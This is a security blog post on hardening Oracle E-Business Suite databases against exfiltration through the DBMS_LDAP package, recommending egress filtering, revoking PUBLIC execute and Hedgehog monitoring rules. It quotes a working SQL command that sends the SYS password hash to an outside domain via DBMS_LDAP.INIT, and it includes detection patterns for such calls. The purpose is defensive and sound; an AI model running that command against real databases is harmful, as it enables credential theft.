Three Tier Oracle Security in London ~ Paul M. Wright

(nix, oracle, java, www, cloud ) intersect (safety, security, reliability, integrity)


E-Business Suite Security and DBMS_LDAP.INIT

Hi Folks,

A vulnerability in E-Business Suite R12 requires a non-default diagnostics mode, so it is low risk.
http://www.securityfocus.com/archive/1/509460
Having said that, it is worth keeping an eye on Internet-facing Oracle applications, though there is not a huge amount on this from O'Reilly and Apress.
Google Books has a relevant book free of charge named "Security, Audit and Control Features Oracle E-Business Suite": http://books.google.co.uk/books?id=JWrCxjgsfHcC&printsec=frontcover#v=onepage&q=&f=false
The main book for E-Business Suite security is John Abel's, though that is based on 11i of course.
Steven Chan's blog is a good read for Oracle Apps security as well.

Other recent related reading has included http://www.databasesecurity.com/ExploitingPLSQLinOracle11g.pdf . This paper confirms the importance of firewall egress filtering in Oracle three-tier environments. Commands like the following, for instance, should be prevented from exfiltrating data out through the firewall.

SELECT DBMS_LDAP.INIT((SELECT PASSWORD FROM SYS.USER$ WHERE NAME ='SYS')||'.oraclesecurity.com',80) FROM DUAL;

The executing account only needs SELECT ANY DICTIONARY, because DBMS_LDAP is executable by PUBLIC:

SQL> select grantee from all_tab_privs where table_name='DBMS_LDAP';
GRANTEE
------------------------------
PUBLIC

The database server's IP address has no business opening an outbound connection through the Internet-facing firewall. This command can be added to the other examples in http://www.red-database-security.com/wp/oracle_cheat_sheet.pdf

So part of the solution to this issue (along with blocking egress) is to:

SQL> conn sys as sysdba
Enter password:
Connected.
SQL> REVOKE EXECUTE ON SYS.DBMS_LDAP FROM PUBLIC;
Revoke succeeded.

But what uses this package under the hood, and is there any software within the DB/application architecture that depends on that PUBLIC execute? Well, if you have read my latest paper, SecuringJavaInOracle, you will know that the solution is to write a Hedgehog rule on the SYS.DBMS_LDAP package, monitoring all calls that involve that package so you can see what actually uses it:

Object='SYS.DBMS_LDAP'

Note that the above rule only triggers when DBMS_LDAP is successfully executed. It is good for profiling the use of the package, but to alert on failed attempts to use or exploit the package, Hedgehog (HH) must alert on the text of the SQL statement as follows:

Statement matches 'DBMS_LDAP'

This second Statement rule will alert even if the executing statement fails, due to lack of the correct privilege for instance. A way to test that this rule works is as follows.

Select 'DBMS_LDAP ' from dual;

This will trigger the second rule to alert but not the first.
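As an added illustration (not part of the original post, and not Hedgehog's own rule engine), the following Python models the two rule types over constructed audit records: the exfiltration statement before and after the REVOKE, the test statement above, and a hypothetical application procedure (APPS.LDAP_SYNC) that calls DBMS_LDAP indirectly, which only the Object rule can profile.

```python
import re
from dataclasses import dataclass, field

# Constructed audit record: what a monitor such as Hedgehog sees per statement.
# Field names are assumptions for this example, not Hedgehog's own schema.
@dataclass
class AuditRecord:
    user: str
    statement: str                                       # SQL text as submitted
    executed_objects: set = field(default_factory=set)   # objects that actually ran
    succeeded: bool = True

# Rule 1, modelled on Object='SYS.DBMS_LDAP': fires only when the package
# really executed, whether called directly or from inside another procedure.
def object_rule(rec, obj="SYS.DBMS_LDAP"):
    return rec.succeeded and obj in rec.executed_objects

# Rule 2, modelled on Statement matches 'DBMS_LDAP': a text match only, so it
# also fires on failed or merely attempted calls. Case-insensitive because
# unquoted Oracle identifiers are.
STATEMENT_PATTERN = re.compile(r"DBMS_LDAP", re.IGNORECASE)

def statement_rule(rec):
    return STATEMENT_PATTERN.search(rec.statement) is not None

def evaluate(records):
    """Return one (user, object_rule_fired, statement_rule_fired) per record."""
    return [(r.user, object_rule(r), statement_rule(r)) for r in records]

# Constructed sample traffic covering the cases discussed in the post.
EXFIL = ("SELECT DBMS_LDAP.INIT((SELECT PASSWORD FROM SYS.USER$ WHERE NAME='SYS')"
         "||'.oraclesecurity.com',80) FROM DUAL")
SAMPLE = [
    # Before the REVOKE: the call succeeds, so both rules fire.
    AuditRecord("SCOTT", EXFIL, {"SYS.DBMS_LDAP", "SYS.USER$"}, True),
    # After REVOKE ... FROM PUBLIC: same text, call rejected; only rule 2 fires.
    AuditRecord("SCOTT", EXFIL, set(), False),
    # The post's test statement: a string literal, the package never runs.
    AuditRecord("SCOTT", "Select 'DBMS_LDAP ' from dual", set(), True),
    # Legitimate use hidden inside a hypothetical application procedure:
    # rule 1 profiles it, rule 2 never sees the package name in the text.
    AuditRecord("APPS", "BEGIN ldap_sync.refresh; END;",
                {"APPS.LDAP_SYNC", "SYS.DBMS_LDAP"}, True),
]

if __name__ == "__main__":
    for user, obj_hit, stmt_hit in evaluate(SAMPLE):
        print(f"{user:6} object_rule={obj_hit!s:5} statement_rule={stmt_hit}")
```

Running it shows why both rules are needed: the Statement rule catches attempts that never reach the package, while the Object rule is the only one that reveals dependent application code before the REVOKE breaks it.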

Using the above method we can fix security issues with a low risk of affecting the application's functionality. Real-time application monitoring is an important part of the SDLC in mature applications, along with static code analysis and dynamic application testing. More on this at the upcoming ISSD Conference.

Cheers,
Paul
